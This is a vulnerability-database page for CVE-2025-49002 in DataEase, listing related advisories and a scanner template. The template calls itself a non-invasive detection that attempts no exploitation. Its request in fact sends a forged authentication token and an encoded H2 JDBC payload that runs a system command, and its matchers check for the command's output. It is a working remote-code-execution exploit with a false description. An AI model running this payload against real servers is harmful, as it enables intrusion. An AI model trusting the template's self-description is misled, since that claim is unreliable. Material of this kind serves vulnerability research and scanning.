| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Exploit for Authentication Bypass by Spoofing in Dataease | 21 Oct 202510:11 | – | githubexploit | |
| CVE-2025-49002 | 4 Jun 202500:46 | – | circl | |
| DataEase 安全漏洞 | 3 Jun 202500:00 | – | cnnvd | |
| CVE-2025-49002 | 3 Jun 202520:37 | – | cve | |
| CVE-2025-49002 Dataease H2 Database Remote Code Execution (RCE) Bypass Vulnerability | 3 Jun 202520:37 | – | cvelist | |
| EUVD-2025-16788 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-49002 | 3 Jun 202521:15 | – | nvd | |
| CVE-2025-49002 Dataease H2 Database Remote Code Execution (RCE) Bypass Vulnerability | 3 Jun 202520:37 | – | osv | |
| PT-2025-23671 | 3 Jun 202500:00 | – | ptsecurity | |
| CVE-2025-49002 | 5 Jun 202521:18 | – | redhatcve |
id: CVE-2025-49002
info:
name: DataEase - Remote Code Execution
author: WeQi
severity: high
description: |
DataEase is an open-source business intelligence and data visualization platform. Public advisories state that CVE-2025-49002 is related to a bypass in the previous fix for CVE-2025-32966 involving case-insensitive handling of restricted H2 JDBC keywords. This template is a non-invasive detection template intended only to identify exposed DataEase instances and extract possible version hints for manual verification. It does not attempt authentication bypass, JDBC exploitation, or command execution.
impact: |
If the target is running an affected DataEase version, an attacker may exploit the vulnerable logic as part of a broader attack chain. Public exposure of the application increases risk.
remediation: |
Upgrade DataEase to 2.10.10 or later, restrict public access to management/API endpoints, and review whether vulnerable datasource-related interfaces are exposed.
reference:
- https://github.com/dataease/dataease/security/advisories/GHSA-999m-jv2p-5h34
- https://nvd.nist.gov/vuln/detail/CVE-2025-49002
classification:
cve-id: CVE-2025-49002
epss-score: 0.41835
epss-percentile: 0.98514
cwe-id: CWE-290
metadata:
verified: true
max-request: 1
vendor: fit2cloud
product: dataease
fofa-query: app="FIT2CLOUD-DataEase"
shodan-query: http.html:"DataEase"
tags: cve,cve2025,dataease,fit2cloud
http:
- raw:
- |
POST /de2api/datasource/getSchema HTTP/1.1
Host: {{Hostname}}
X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
Content-Type: application/json
{
"id": "",
"name": "11",
"description": "",
"type": "h2",
"apiConfiguration": [],
"paramsConfiguration": [],
"enableDataFill": false,
"configuration": "eyJkYXRhQmFzZSI6IiIsImpkYmMiOiJqZGJjOmgyOm1lbTp0ZXN0O2luXFxpdD1EUk9QIEFMSUFTIElGIEVYSVNUUyBFWEVDXFw7Q1JFQVRcXEUgQUxJQVMgRVhFQyBBUyAkJHZvaWQgZXhlYygpIHRocm93cyBFeGNlcHRpb24ge2phdmEubGFuZy5TdHJpbmcgcyA9IG5ldyBqYXZhLnV0aWwuU2Nhbm5lcihqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhcImlkXCIpLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlcihcIlxcQVwiKS5uZXh0KClcXDt0aHJvdyBuZXcgamF2YS5sYW5nLkV4Y2VwdGlvbihzKVxcO30kJFxcO0NBTEwgRVhFQygpXFw7IiwidXJsVHlwZSI6ImpkYmNVcmwiLCJzc2hUeXBlIjoicGFzc3dvcmQiLCJleHRyYVBhcmFtcyI6IiIsInVzZXJuYW1lIjoiMTIzIiwiIHBhc3N3b3JkIjoiMTIzIiwiaG9zdCI6IiIsImF1dGhNZXRob2QiOiIiLCJwb3J0IjowLCJpbml0aWFsUG9vbFNpemUiOjUsIm1pblBvb2xTaXplIjo1LCJtYXhQb29sU2l6ZSI6NSwicXVlcnlUaW1lb3V0IjozMH0"
}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Exception calling", "exec():")'
- 'contains(content_type, "application/json")'
- 'regex("uid=[0-9]+.*gid=[0-9]+.*", body)'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502207c84c7415b3c06626d2f1ad7f2a76a995e1785160df6de97c487875559439d17022100ff6a359829b8fb8cc0eae9e85e39e95862edde0ebe0d419e0d950d2124d9fce9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation